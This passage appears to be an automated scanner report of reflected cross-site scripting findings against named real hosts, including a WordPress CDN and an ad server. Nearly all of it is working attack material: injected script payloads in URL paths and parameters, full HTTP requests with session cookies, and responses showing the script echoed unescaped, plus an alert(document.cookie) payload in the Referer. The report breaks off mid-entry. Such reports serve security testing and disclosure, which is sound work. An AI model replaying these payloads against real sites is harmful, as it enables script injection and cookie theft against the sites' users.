GET /wp-content/plugins21ed3"><script>alert(1)</script>ff23996d7ad/sidebar-login/style.css?ver=3.1.1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41abd"><script>alert(1)</script>143b5139f95 was submitted in the REST URL parameter 4. This input was echoed as 41abd\"><script>alert(1)</script>143b5139f95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sidebar-login/style.css41abd"><script>alert(1)</script>143b5139f95?ver=3.1.1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23c07"><script>alert(1)</script>ac1ebf8b1b6 was submitted in the REST URL parameter 1. This input was echoed as 23c07\"><script>alert(1)</script>ac1ebf8b1b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content23c07"><script>alert(1)</script>ac1ebf8b1b6/themes/atahualpa/images/favicon/fff-link.ico HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b95"><script>alert(1)</script>57b77ffa238 was submitted in the REST URL parameter 2. This input was echoed as f3b95\"><script>alert(1)</script>57b77ffa238 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themesf3b95"><script>alert(1)</script>57b77ffa238/atahualpa/images/favicon/fff-link.ico HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8f9"><script>alert(1)</script>bd1c2d36605 was submitted in the REST URL parameter 6. This input was echoed as cd8f9\"><script>alert(1)</script>bd1c2d36605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/atahualpa/images/favicon/fff-link.icocd8f9"><script>alert(1)</script>bd1c2d36605 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646e0"><script>alert(1)</script>27728feb339 was submitted in the REST URL parameter 1. This input was echoed as 646e0\"><script>alert(1)</script>27728feb339 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content646e0"><script>alert(1)</script>27728feb339/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57026"><script>alert(1)</script>74b1e57ccc9 was submitted in the REST URL parameter 2. This input was echoed as 57026\"><script>alert(1)</script>74b1e57ccc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes57026"><script>alert(1)</script>74b1e57ccc9/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b46e"><script>alert(1)</script>5ec3496cd24 was submitted in the REST URL parameter 5. This input was echoed as 2b46e\"><script>alert(1)</script>5ec3496cd24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/atahualpa/js/DD_roundies.js2b46e"><script>alert(1)</script>5ec3496cd24?ver=0.0.2a HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 398c9"><script>alert(1)</script>4e487c44e11 was submitted in the REST URL parameter 1. This input was echoed as 398c9\"><script>alert(1)</script>4e487c44e11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes398c9"><script>alert(1)</script>4e487c44e11/js/l10n.js?ver=20101110 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e502"><script>alert(1)</script>87deeb2ec4f was submitted in the REST URL parameter 3. This input was echoed as 5e502\"><script>alert(1)</script>87deeb2ec4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/l10n.js5e502"><script>alert(1)</script>87deeb2ec4f?ver=20101110 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd65"><script>alert(1)</script>dfef0ede538 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMdbd65"><script>alert(1)</script>dfef0ede538/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:33 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48cc0"><script>alert(1)</script>b9e470def13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM48cc0"><script>alert(1)</script>b9e470def13/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:35 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d4f"><script>alert(1)</script>91bcd1e71d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/12086108130@x23a8d4f"><script>alert(1)</script>91bcd1e71d8?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:37 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e43"-alert(1)-"2c71c5674a2 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:31 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2438 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2";
3.52. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/12086108130@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b86c4"-alert(1)-"968eecc14d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:32 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2441 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6939f"><script>alert(1)</script>d229212c062 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM6939f"><script>alert(1)</script>d229212c062/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:28 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7757"><script>alert(1)</script>67578923dc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMd7757"><script>alert(1)</script>67578923dc4/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:30 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db149"><script>alert(1)</script>45420a5298d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1377241392@x23db149"><script>alert(1)</script>45420a5298d?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:33 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html
The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bcfc"-alert(1)-"38d19f0405 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:27 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2437 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405";
3.57. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1377241392@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bee7"-alert(1)-"d96185b3a49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:27 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2441 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a88"><script>alert(1)</script>4134ea3c517 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM37a88"><script>alert(1)</script>4134ea3c517/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:45 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bb87"><script>alert(1)</script>cb041db047f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM1bb87"><script>alert(1)</script>cb041db047f/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:47 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8df"><script>alert(1)</script>c890c99deb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
